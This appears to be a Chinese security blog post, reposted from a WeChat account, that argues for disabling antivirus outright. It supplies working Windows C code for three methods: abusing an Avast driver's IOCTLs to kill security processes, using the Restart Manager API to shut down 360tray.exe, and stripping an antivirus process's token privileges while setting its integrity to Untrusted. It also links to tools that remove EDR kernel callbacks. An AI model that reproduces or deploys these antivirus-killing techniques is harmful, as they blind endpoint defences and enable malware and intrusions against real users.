如题
视频链接:https://www.bilibili.com/video/BV1Kx4y1f7CK/?spm_id_from=333.999.0.0
驱动Kill参考
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 process = { sizeof(PROCESSENTRY32) };
WCHAR process_name7[MAX_PATH] = { TEXT("ZhuDongFangYu.exe") };
HANDLE a = CreateFileA(
"\\.\aswSP_ArPot2",
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
int InBuffer = 0;
DWORD BytesReturned = NULL;
DeviceIoControl(a, 0x7299C004, &InBuffer, 4, 0, 0, &BytesReturned, 0);
HANDLE aa = CreateFileW(L"\\.\aswSP_Avar", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
while (Process32Next(hProcessSnap, &process)) {
/*printf("%wsrn", process.szExeFile);*/
if (WcharIf(process_name1, process.szExeFile) || WcharIf(process_name2, process.szExeFile) || WcharIf(process_name3, process.szExeFile) ||
WcharIf(process_name4, process.szExeFile) || WcharIf(process_name5, process.szExeFile) || WcharIf(process_name6, process.szExeFile)
) {
DeviceIoControl(aa, 0x9988C094, &process.th32ProcessID, 4, 0, 0, &BytesReturned, 0);
}
}
移除回调
win64 HOOK SSDT kpp patchguard 回调
https://github.com/br-sn/CheekyBlinder
https://github.com/uf0o/windows-ps-callbacks-experiments/tree/master/edr-driver
https://github.com/lawiet47/STFUEDR
BYOD
阻止流量出站
https://www.wangan.com/p/11v8239694f8fe03
R3terminate
滥用
https://learn.microsoft.com/en-us/windows/win32/rstmgr/restart-manager-portal
https://www.crowdstrike.com/blog/windows-restart-manager-part-1/
#include <windows.h>
#include <RestartManager.h>
#include <stdio.h>
#pragma comment(lib,"Rstrtmgr.lib")
/*
1.开始一个新的会话,使用 RmStartSession 函数。这将返回一个会话句柄和一个会话密钥。
2.将要管理的文件或进程注册为资源,使用 RmRegisterResources 函数。
3.使用 RmGetList 函数来检索所有与已注册的资源相关的进程信息。这将返回一个包含 RM_PROCESS_INFO 结构的数组,其中包含有关这些进程的详细信息,例如进程 ID 和进程名称。
4.使用 RmShutdown 函数来关闭所有与已注册的资源相关的进程。这将使这些进程在关闭时执行一个安全的关闭过程,以确保数据的一致性和完整性。
5.最后,使用 RmEndSession 函数来结束会话
*/
int __cdecl wmain(int argc, WCHAR** argv)
{
DWORD dwSessionHandle = 0xFFFFFFFF;
WCHAR szSessionKey[CCH_RM_SESSION_KEY + 1] = { 0 };
DWORD dwError = RmStartSession(&dwSessionHandle, 0, szSessionKey);
wprintf(L"RmStartSession returned %dn", dwError);
if (dwError == ERROR_SUCCESS)
{
// PCWSTR pszFile = argv[1];
PCWSTR pszFile = L"D:\360\360Safe\safemon\360tray.exe";
dwError = RmRegisterResources(dwSessionHandle, 1, &pszFile, 0, NULL, 0, NULL);
if (dwError == ERROR_SUCCESS)
{
DWORD dwReason;
UINT i;
UINT nProcInfoNeeded;
UINT nProcInfo = 100;
RM_PROCESS_INFO rgpi[100];
dwError = RmGetList(dwSessionHandle, &nProcInfoNeeded, &nProcInfo, rgpi, &dwReason);
if (dwError == ERROR_SUCCESS)
{
RmShutdown(dwSessionHandle, 0, NULL);
}
}
RmEndSession(dwSessionHandle);
}
return 0;
}
降低令牌完整性
#include <Windows.h>
#include <stdio.h>
#include <iostream>
#include <TlHelp32.h>
#include <conio.h>
bool EnableDebugPrivilege()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
return FALSE;
}
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
{
CloseHandle(hToken);
return false;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
{
CloseHandle(hToken);
return false;
}
return true;
}
int getpid(LPCWSTR procname) {
DWORD procPID = 0;
LPCWSTR processName = L"";
PROCESSENTRY32 processEntry = {};
processEntry.dwSize = sizeof(PROCESSENTRY32);
// replace this with Ntquerysystemapi
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, procPID);
if (Process32First(snapshot, &processEntry))
{
while (_wcsicmp(processName, procname) != 0)
{
Process32Next(snapshot, &processEntry);
processName = processEntry.szExeFile;
procPID = processEntry.th32ProcessID;
}
printf("[+] Got target proc PID: %dn", procPID);
}
return procPID;
}
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("LookupPrivilegeValue error: %un", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;
else
tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %un", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("The token does not have the specified privilege. n");
return FALSE;
}
return TRUE;
}
int main(int argc, char** argv)
{
LUID sedebugnameValue;
EnableDebugPrivilege();
wchar_t procname[80];
size_t convertedChars = 0;
mbstowcs_s(&convertedChars, procname, 80, argv[1], _TRUNCATE);
int pid = getpid(procname);
// printf("PID %dn", pid);
printf("[*] Killing AV...n");
// hardcoding PID of msmpeng for now
HANDLE phandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
if (phandle != INVALID_HANDLE_VALUE) {
printf("[*] Opened Target Handlen");
}
else {
printf("[-] Failed to open Process Handlen");
}
// printf("%pn", phandle);
HANDLE ptoken;
BOOL token = OpenProcessToken(phandle, TOKEN_ALL_ACCESS, &ptoken);
if (token) {
printf("[*] Opened Target Token Handlen");
}
else {
printf("[-] Failed to open Token Handlen");
}
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue);
TOKEN_PRIVILEGES tkp;
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(ptoken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
printf("[-] Failed to Adjust Token's Privilegesn");
return 0;
}
// Remove all privileges
SetPrivilege(ptoken, SE_DEBUG_NAME, TRUE);
SetPrivilege(ptoken, SE_CHANGE_NOTIFY_NAME, TRUE);
SetPrivilege(ptoken, SE_TCB_NAME, TRUE);
SetPrivilege(ptoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(ptoken, SE_LOAD_DRIVER_NAME, TRUE);
SetPrivilege(ptoken, SE_RESTORE_NAME, TRUE);
SetPrivilege(ptoken, SE_BACKUP_NAME, TRUE);
SetPrivilege(ptoken, SE_SECURITY_NAME, TRUE);
SetPrivilege(ptoken, SE_SYSTEM_ENVIRONMENT_NAME, TRUE);
SetPrivilege(ptoken, SE_INCREASE_QUOTA_NAME, TRUE);
SetPrivilege(ptoken, SE_TAKE_OWNERSHIP_NAME, TRUE);
SetPrivilege(ptoken, SE_INC_BASE_PRIORITY_NAME, TRUE);
SetPrivilege(ptoken, SE_SHUTDOWN_NAME, TRUE);
SetPrivilege(ptoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);
printf("[*] Removed All Privilegesn");
DWORD integrityLevel = SECURITY_MANDATORY_UNTRUSTED_RID;
SID integrityLevelSid{};
integrityLevelSid.Revision = SID_REVISION;
integrityLevelSid.SubAuthorityCount = 1;
integrityLevelSid.IdentifierAuthority.Value[5] = 16;
integrityLevelSid.SubAuthority[0] = integrityLevel;
TOKEN_MANDATORY_LABEL tokenIntegrityLevel = {};
tokenIntegrityLevel.Label.Attributes = SE_GROUP_INTEGRITY;
tokenIntegrityLevel.Label.Sid = &integrityLevelSid;
if (!SetTokenInformation(
ptoken,
TokenIntegrityLevel,
&tokenIntegrityLevel,
sizeof(TOKEN_MANDATORY_LABEL) + GetLengthSid(&integrityLevelSid)))
{
printf("SetTokenInformation failedn");
}
else {
printf("[*] Token Integrity set to Untrustedn");
}
CloseHandle(ptoken);
CloseHandle(phandle);
}
原文始发于微信公众号(老鑫安全):能关闭防病毒软件干嘛要做免杀呢
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论